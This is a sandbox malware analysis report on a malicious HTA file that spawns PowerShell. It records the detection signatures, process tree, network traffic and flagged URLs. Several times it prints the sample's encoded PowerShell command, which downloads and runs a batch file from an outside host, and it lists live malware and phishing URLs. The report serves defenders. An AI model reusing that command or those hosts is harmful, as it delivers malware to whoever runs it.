Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
c1.hta

Overview

General Information

Sample name:c1.hta
Analysis ID:1589374
MD5:ecfb39d00afa505fb6af958241ff5e35
SHA1:7425bc879cf05b14248e6cd60186a39423c35a7e
SHA256:a70bc984039d77fc9e208f2daf97d2578032388ceee67fccf1da27d81d8ecfba
Tags:htauser-abuse_ch
Infos:

Detection

Score:64
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
AI detected suspicious sample
Encrypted powershell cmdline option found
Sigma detected: PowerShell Base64 Encoded Invoke Keyword
Sigma detected: Suspicious MSHTA Child Process
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Sigma detected: Suspicious Execution of Powershell with Base64
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Process Tree

  • System is w10x64
  • mshta.exe (PID: 7036 cmdline: mshta.exe "C:\Users\user\Desktop\c1.hta" MD5: 06B02D5C097C7DB1F109749C45F3F505)
    • powershell.exe (PID: 4456 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -EncodedCommand WwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAGMAdQByAGkAdAB5AFAAcgBvAHQAbwBjAG8AbAAgAD0AIABbAE4AZQB0AC4AUwBlAGMAdQByAGkAdAB5AFAAcgBvAHQAbwBjAG8AbABUAHkAcABlAF0AOgA6AFQAbABzADEAMgA7AA0ACgBoAHQAdABwAHMAOgAvAC8AYwBhAG4AZAB3AGYAYQByAG0AcwBsAGwAYwAuAGMAbwBtAC8AYwAyAC4AYgBhAHQAPQAnAGgAdAB0AHAAcwA6AC8ALwBjAGEAbgBkAHcAZgBhAHIAbQBzAGwAbABjAC4AYwBvAG0ALwBjADIALgBiAGEAdAAnADsADQAKAEMAOgBcAFUAcwBlAHIAcwBcAGEAcwBhAG8AbABcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwAYwAyAC4AYgBhAHQAPQBDADoAXABVAHMAZQByAHMAXABhAHMAYQBvAGwAXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAVABlAG0AcAAgACsAIAAnAFwAYwAyAC4AYgBhAHQAJwA7AA0ACgBJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAaAB0AHQAcABzADoALwAvAGMAYQBuAGQAdwBmAGEAcgBtAHMAbABsAGMALgBjAG8AbQAvAGMAMgAuAGIAYQB0ACAALQBPAHUAdABGAGkAbABlACAAQwA6AFwAVQBzAGUAcgBzAFwAYQBzAGEAbwBsAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcAFQAZQBtAHAAXABjADIALgBiAGEAdAA7AA0ACgBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIABDADoAXABVAHMAZQByAHMAXABhAHMAYQBvAGwAXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAVABlAG0AcABcAGMAMgAuAGIAYQB0ACAALQBOAG8ATgBlAHcAVwBpAG4AZABvAHcA MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 3668 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

System Summary

barindex
Sigma detected: PowerShell Base64 Encoded Invoke Keyword
Source: Process startedAuthor: pH-T (Nextron Systems), Harjot Singh, @cyb3rjy0t: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -EncodedCommand WwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAGMAdQByAGkAdAB5AFAAcgBvAHQAbwBjAG8AbAAgAD0AIABbAE4AZQB0AC4AUwBlAGMAdQByAGkAdAB5AFAAcgBvAHQAbwBjAG8AbABUAHkAcABlAF0AOgA6AFQAbABzADEAMgA7AA0ACgBoAHQAdABwAHMAOgAvAC8AYwBhAG4AZAB3AGYAYQByAG0AcwBsAGwAYwAuAGMAbwBtAC8AYwAyAC4AYgBhAHQAPQAnAGgAdAB0AHAAcwA6AC8ALwBjAGEAbgBkAHcAZgBhAHIAbQBzAGwAbABjAC4AYwBvAG0ALwBjADIALgBiAGEAdAAnADsADQAKAEMAOgBcAFUAcwBlAHIAcwBcAGEAcwBhAG8AbABcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwAYwAyAC4AYgBhAHQAPQBDADoAXABVAHMAZQByAHMAXABhAHMAYQBvAGwAXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAVABlAG0AcAAgACsAIAAnAFwAYwAyAC4AYgBhAHQAJwA7AA0ACgBJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAaAB0AHQAcABzADoALwAvAGMAYQBuAGQAdwBmAGEAcgBtAHMAbABsAGMALgBjAG8AbQAvAGMAMgAuAGIAYQB0ACAALQBPAHUAdABGAGkAbABlACAAQwA6AFwAVQBzAGUAcgBzAFwAYQBzAGEAbwBsAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcAFQAZQBtAHAAXABjADIALgBiAGEAdAA7AA0ACgBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIABDADoAXABVAHMAZQByAHMAXABhAHMAYQBvAGwAXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAVABlAG0AcABcAGMAMgAuAGIAYQB0ACAALQBOAG8ATgBlAHcAVwBpAG4AZABvAHcA, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -EncodedCommand WwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAGMAdQByAGkAdAB5AFAAcgBvAHQAbwBjAG8AbAAgAD0AIABbAE4AZQB0AC4AUwBlAGMAdQByAGkAdAB5AFAAcgBvAHQAbwBjAG8AbABUAHkAcABlAF0AOgA6AFQAbABzADEAMgA7AA0ACgBoAHQAdABwAHMAOgAvAC8AYwBhAG4AZAB3AGYAYQByAG0AcwBsAGwAYwAuAGMAbwBtAC8AYwAyAC4AYgBhAHQAPQAnAGgAdAB0AHAAcwA6AC8ALwBjAGEAbgBkAHcAZgBhAHIAbQBzAGwAbABjAC4AYwBvAG0ALwBjADIALgBiAGEAdAAnADsADQAKAEMAOgBcAFUAcwBlAHIAcwBcAGEAcwBhAG8AbABcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwAYwAyAC4AYgBhAHQAPQBDADoAXABVAHMAZQByAHMAXABhAHMAYQBvAGwAXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAVABlAG0AcAAgACsAIAAnAFwAYwAyAC4AYgBhAHQAJwA7AA0ACgBJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAaAB0AHQAcABzADoALwAvAGMAYQBuAGQAdwBmAGEAcgBtAHMAbABsAGMALgBjAG8AbQAvAGMAMgAuAGIAYQB0ACAALQBPAHUAdABGAGkAbABlACAAQwA6AFwAVQBzAGUAcgBzAFwAYQBzAGEAbwBsAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcAFQAZQBtAHAAXABjADIALgBiAGEAdAA7AA0ACgBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIABDADoAXABVAHMAZQByAHMAXABhAHMAYQBvAGwAXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAVABlAG0AcABcAGMAMgAuAGIAYQB0ACAALQBOAG8ATgBlAHcAVwBpAG4AZABvAHcA, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta.exe "C:\Users\user\Desktop\c1.hta", ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 7036, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -EncodedCom
Sigma detected: Suspicious MSHTA Child Process
Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -EncodedCommand WwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAGMAdQByAGkAdAB5AFAAcgBvAHQAbwBjAG8AbAAgAD0AIABbAE4AZQB0AC4AUwBlAGMAdQByAGkAdAB5AFAAcgBvAHQAbwBjAG8AbABUAHkAcABlAF0AOgA6AFQAbABzADEAMgA7AA0ACgBoAHQAdABwAHMAOgAvAC8AYwBhAG4AZAB3AGYAYQByAG0AcwBsAGwAYwAuAGMAbwBtAC8AYwAyAC4AYgBhAHQAPQAnAGgAdAB0AHAAcwA6AC8ALwBjAGEAbgBkAHcAZgBhAHIAbQBzAGwAbABjAC4AYwBvAG0ALwBjADIALgBiAGEAdAAnADsADQAKAEMAOgBcAFUAcwBlAHIAcwBcAGEAcwBhAG8AbABcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwAYwAyAC4AYgBhAHQAPQBDADoAXABVAHMAZQByAHMAXABhAHMAYQBvAGwAXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAVABlAG0AcAAgACsAIAAnAFwAYwAyAC4AYgBhAHQAJwA7AA0ACgBJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAaAB0AHQAcABzADoALwAvAGMAYQBuAGQAdwBmAGEAcgBtAHMAbABsAGMALgBjAG8AbQAvAGMAMgAuAGIAYQB0ACAALQBPAHUAdABGAGkAbABlACAAQwA6AFwAVQBzAGUAcgBzAFwAYQBzAGEAbwBsAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcAFQAZQBtAHAAXABjADIALgBiAGEAdAA7AA0ACgBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIABDADoAXABVAHMAZQByAHMAXABhAHMAYQBvAGwAXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAVABlAG0AcABcAGMAMgAuAGIAYQB0ACAALQBOAG8ATgBlAHcAVwBpAG4AZABvAHcA, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -EncodedCommand WwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAGMAdQByAGkAdAB5AFAAcgBvAHQAbwBjAG8AbAAgAD0AIABbAE4AZQB0AC4AUwBlAGMAdQByAGkAdAB5AFAAcgBvAHQAbwBjAG8AbABUAHkAcABlAF0AOgA6AFQAbABzADEAMgA7AA0ACgBoAHQAdABwAHMAOgAvAC8AYwBhAG4AZAB3AGYAYQByAG0AcwBsAGwAYwAuAGMAbwBtAC8AYwAyAC4AYgBhAHQAPQAnAGgAdAB0AHAAcwA6AC8ALwBjAGEAbgBkAHcAZgBhAHIAbQBzAGwAbABjAC4AYwBvAG0ALwBjADIALgBiAGEAdAAnADsADQAKAEMAOgBcAFUAcwBlAHIAcwBcAGEAcwBhAG8AbABcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwAYwAyAC4AYgBhAHQAPQBDADoAXABVAHMAZQByAHMAXABhAHMAYQBvAGwAXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAVABlAG0AcAAgACsAIAAnAFwAYwAyAC4AYgBhAHQAJwA7AA0ACgBJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAaAB0AHQAcABzADoALwAvAGMAYQBuAGQAdwBmAGEAcgBtAHMAbABsAGMALgBjAG8AbQAvAGMAMgAuAGIAYQB0ACAALQBPAHUAdABGAGkAbABlACAAQwA6AFwAVQBzAGUAcgBzAFwAYQBzAGEAbwBsAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcAFQAZQBtAHAAXABjADIALgBiAGEAdAA7AA0ACgBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIABDADoAXABVAHMAZQByAHMAXABhAHMAYQBvAGwAXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAVABlAG0AcABcAGMAMgAuAGIAYQB0ACAALQBOAG8ATgBlAHcAVwBpAG4AZABvAHcA, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta.exe "C:\Users\user\Desktop\c1.hta", ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 7036, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -EncodedCom
Sigma detected: Suspicious Execution of Powershell with Base64
Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -EncodedCommand WwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAGMAdQByAGkAdAB5AFAAcgBvAHQAbwBjAG8AbAAgAD0AIABbAE4AZQB0AC4AUwBlAGMAdQByAGkAdAB5AFAAcgBvAHQAbwBjAG8AbABUAHkAcABlAF0AOgA6AFQAbABzADEAMgA7AA0ACgBoAHQAdABwAHMAOgAvAC8AYwBhAG4AZAB3AGYAYQByAG0AcwBsAGwAYwAuAGMAbwBtAC8AYwAyAC4AYgBhAHQAPQAnAGgAdAB0AHAAcwA6AC8ALwBjAGEAbgBkAHcAZgBhAHIAbQBzAGwAbABjAC4AYwBvAG0ALwBjADIALgBiAGEAdAAnADsADQAKAEMAOgBcAFUAcwBlAHIAcwBcAGEAcwBhAG8AbABcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwAYwAyAC4AYgBhAHQAPQBDADoAXABVAHMAZQByAHMAXABhAHMAYQBvAGwAXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAVABlAG0AcAAgACsAIAAnAFwAYwAyAC4AYgBhAHQAJwA7AA0ACgBJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAaAB0AHQAcABzADoALwAvAGMAYQBuAGQAdwBmAGEAcgBtAHMAbABsAGMALgBjAG8AbQAvAGMAMgAuAGIAYQB0ACAALQBPAHUAdABGAGkAbABlACAAQwA6AFwAVQBzAGUAcgBzAFwAYQBzAGEAbwBsAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcAFQAZQBtAHAAXABjADIALgBiAGEAdAA7AA0ACgBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIABDADoAXABVAHMAZQByAHMAXABhAHMAYQBvAGwAXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAVABlAG0AcABcAGMAMgAuAGIAYQB0ACAALQBOAG8ATgBlAHcAVwBpAG4AZABvAHcA, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -EncodedCommand WwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAGMAdQByAGkAdAB5AFAAcgBvAHQAbwBjAG8AbAAgAD0AIABbAE4AZQB0AC4AUwBlAGMAdQByAGkAdAB5AFAAcgBvAHQAbwBjAG8AbABUAHkAcABlAF0AOgA6AFQAbABzADEAMgA7AA0ACgBoAHQAdABwAHMAOgAvAC8AYwBhAG4AZAB3AGYAYQByAG0AcwBsAGwAYwAuAGMAbwBtAC8AYwAyAC4AYgBhAHQAPQAnAGgAdAB0AHAAcwA6AC8ALwBjAGEAbgBkAHcAZgBhAHIAbQBzAGwAbABjAC4AYwBvAG0ALwBjADIALgBiAGEAdAAnADsADQAKAEMAOgBcAFUAcwBlAHIAcwBcAGEAcwBhAG8AbABcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwAYwAyAC4AYgBhAHQAPQBDADoAXABVAHMAZQByAHMAXABhAHMAYQBvAGwAXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAVABlAG0AcAAgACsAIAAnAFwAYwAyAC4AYgBhAHQAJwA7AA0ACgBJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAaAB0AHQAcABzADoALwAvAGMAYQBuAGQAdwBmAGEAcgBtAHMAbABsAGMALgBjAG8AbQAvAGMAMgAuAGIAYQB0ACAALQBPAHUAdABGAGkAbABlACAAQwA6AFwAVQBzAGUAcgBzAFwAYQBzAGEAbwBsAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcAFQAZQBtAHAAXABjADIALgBiAGEAdAA7AA0ACgBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIABDADoAXABVAHMAZQByAHMAXABhAHMAYQBvAGwAXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAVABlAG0AcABcAGMAMgAuAGIAYQB0ACAALQBOAG8ATgBlAHcAVwBpAG4AZABvAHcA, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta.exe "C:\Users\user\Desktop\c1.hta", ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 7036, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -EncodedCom
Sigma detected: Non Interactive PowerShell Process Spawned
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -EncodedCommand WwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAGMAdQByAGkAdAB5AFAAcgBvAHQAbwBjAG8AbAAgAD0AIABbAE4AZQB0AC4AUwBlAGMAdQByAGkAdAB5AFAAcgBvAHQAbwBjAG8AbABUAHkAcABlAF0AOgA6AFQAbABzADEAMgA7AA0ACgBoAHQAdABwAHMAOgAvAC8AYwBhAG4AZAB3AGYAYQByAG0AcwBsAGwAYwAuAGMAbwBtAC8AYwAyAC4AYgBhAHQAPQAnAGgAdAB0AHAAcwA6AC8ALwBjAGEAbgBkAHcAZgBhAHIAbQBzAGwAbABjAC4AYwBvAG0ALwBjADIALgBiAGEAdAAnADsADQAKAEMAOgBcAFUAcwBlAHIAcwBcAGEAcwBhAG8AbABcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwAYwAyAC4AYgBhAHQAPQBDADoAXABVAHMAZQByAHMAXABhAHMAYQBvAGwAXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAVABlAG0AcAAgACsAIAAnAFwAYwAyAC4AYgBhAHQAJwA7AA0ACgBJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAaAB0AHQAcABzADoALwAvAGMAYQBuAGQAdwBmAGEAcgBtAHMAbABsAGMALgBjAG8AbQAvAGMAMgAuAGIAYQB0ACAALQBPAHUAdABGAGkAbABlACAAQwA6AFwAVQBzAGUAcgBzAFwAYQBzAGEAbwBsAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcAFQAZQBtAHAAXABjADIALgBiAGEAdAA7AA0ACgBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIABDADoAXABVAHMAZQByAHMAXABhAHMAYQBvAGwAXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAVABlAG0AcABcAGMAMgAuAGIAYQB0ACAALQBOAG8ATgBlAHcAVwBpAG4AZABvAHcA, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -EncodedCommand WwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAGMAdQByAGkAdAB5AFAAcgBvAHQAbwBjAG8AbAAgAD0AIABbAE4AZQB0AC4AUwBlAGMAdQByAGkAdAB5AFAAcgBvAHQAbwBjAG8AbABUAHkAcABlAF0AOgA6AFQAbABzADEAMgA7AA0ACgBoAHQAdABwAHMAOgAvAC8AYwBhAG4AZAB3AGYAYQByAG0AcwBsAGwAYwAuAGMAbwBtAC8AYwAyAC4AYgBhAHQAPQAnAGgAdAB0AHAAcwA6AC8ALwBjAGEAbgBkAHcAZgBhAHIAbQBzAGwAbABjAC4AYwBvAG0ALwBjADIALgBiAGEAdAAnADsADQAKAEMAOgBcAFUAcwBlAHIAcwBcAGEAcwBhAG8AbABcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwAYwAyAC4AYgBhAHQAPQBDADoAXABVAHMAZQByAHMAXABhAHMAYQBvAGwAXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAVABlAG0AcAAgACsAIAAnAFwAYwAyAC4AYgBhAHQAJwA7AA0ACgBJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAaAB0AHQAcABzADoALwAvAGMAYQBuAGQAdwBmAGEAcgBtAHMAbABsAGMALgBjAG8AbQAvAGMAMgAuAGIAYQB0ACAALQBPAHUAdABGAGkAbABlACAAQwA6AFwAVQBzAGUAcgBzAFwAYQBzAGEAbwBsAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcAFQAZQBtAHAAXABjADIALgBiAGEAdAA7AA0ACgBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIABDADoAXABVAHMAZQByAHMAXABhAHMAYQBvAGwAXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAVABlAG0AcABcAGMAMgAuAGIAYQB0ACAALQBOAG8ATgBlAHcAVwBpAG4AZABvAHcA, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta.exe "C:\Users\user\Desktop\c1.hta", ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 7036, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -EncodedCom

Suricata Signatures

TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2025-01-12T03:44:00.404366+010018100002Potentially Bad Traffic192.168.2.449732193.26.115.39443TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Antivirus detection for URL or domain
Source: https://myguyapp.com/W2.pdfAvira URL Cloud: Label: phishing
Source: https://candwfarmsllc.com/c2.batAvira URL Cloud: Label: malware
AI detected suspicious sample
Source: Submited SampleIntegrated Neural Analysis Model: Matched 94.4% probability
Source: unknownHTTPS traffic detected: 193.26.115.39:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: Binary string: mscorlib.pdb source: powershell.exe, 00000002.00000002.1697987815.0000000007330000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb35 source: powershell.exe, 00000002.00000002.1692460434.0000000002DF1000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: dows\dll\mscorlib.pdb source: powershell.exe, 00000002.00000002.1697987815.0000000007330000.00000004.00000020.00020000.00000000.sdmp
Source: Joe Sandbox ViewIP Address: 193.26.115.39 193.26.115.39
Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Network trafficSuricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.4:49732 -> 193.26.115.39:443
Source: global trafficHTTP traffic detected: GET /c2.bat HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: candwfarmsllc.comConnection: Keep-Alive
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /c2.bat HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: candwfarmsllc.comConnection: Keep-Alive
Source: global trafficDNS traffic detected: DNS query: candwfarmsllc.com
Source: powershell.exe, 00000002.00000002.1692750838.0000000004DBF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://candwfarmsllc.com
Source: powershell.exe, 00000002.00000002.1695910492.0000000005B48000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000002.00000002.1692750838.0000000004C36000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000002.00000002.1692750838.0000000004AE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000002.00000002.1692750838.0000000004C36000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000002.00000002.1692750838.0000000004AE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
Source: powershell.exe, 00000002.00000002.1692750838.0000000004D65000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://candwfarmsllc.com
Source: powershell.exe, 00000002.00000002.1692750838.0000000004AE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1692750838.0000000004DBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://candwfarmsllc.com/c2.bat
Source: powershell.exe, 00000002.00000002.1692750838.0000000004AE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://candwfarmsllc.com/c2.bat=
Source: powershell.exe, 00000002.00000002.1692750838.0000000004C36000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://candwfarmsllc.com/c2.bat=https://candwfarmsllc.com/c2.bat
Source: powershell.exe, 00000002.00000002.1695910492.0000000005B48000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000002.00000002.1695910492.0000000005B48000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000002.00000002.1695910492.0000000005B48000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000002.00000002.1692750838.0000000004C36000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000002.00000002.1692750838.00000000050D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
Source: powershell.exe, 00000002.00000002.1692750838.0000000004DE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1692750838.0000000004DBF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myguyapp.com/W2.pdf
Source: powershell.exe, 00000002.00000002.1692750838.0000000004DE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1692750838.0000000004DBF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myguyapp.com/msword.zip
